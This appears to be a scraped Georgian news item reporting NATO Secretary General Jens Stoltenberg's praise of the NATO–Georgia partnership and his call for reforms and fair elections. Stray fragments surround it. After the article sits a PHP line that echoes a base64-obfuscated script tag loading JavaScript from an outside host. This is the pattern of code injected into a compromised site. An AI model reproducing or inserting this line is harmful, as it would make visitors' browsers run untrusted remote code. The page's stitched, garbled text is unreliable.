celsiusi
ავერსი შნაიდერი

 მადლობა ნატო-საქართველოს პარტნიორობისადმი თქვენი პირადი ერთგულებისთვის, – ასე მიმართა ნატო-ს გენერალურმა მდივანმა, იენს სტოლტენბერგმა საქართველოს პრემიერ-მინისტრს, ირაკლი კობახიძეს.

სტოლტენბერგის თქმით, საქართველო რასაც აკეთებს ევროკავშირში გაწევრიანებისკენ მიმავალ გზაზე, ზუსტად ემთხვევა იმას, რაც საჭიროა ნატო-ში სრული გაწევრიანებისთვის.

„მნიშვნელოვანია, საქართველომ გააგრძელოს შიდა რეფორმების, დემოკრატიული ღირებულებებისა და კანონის უზენაესობის გაძლიერება, მათ შორის, თავისუფალი და სამართლიანი საპარლამენტო არჩევნების გზით მიმდინარე წლის ოქტომბერში. ასე რომ, პრემიერ-მინისტრო, კიდევ ერთხელ გიხდით მადლობას სტუმართმოყვარეობისთვის. მადლობა ნატო-საქართველოს პარტნიორობისადმი თქვენი პირადი ერთგულებისთვის“, – განაცხადა იენს სტოლტენბერგმა.

174
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");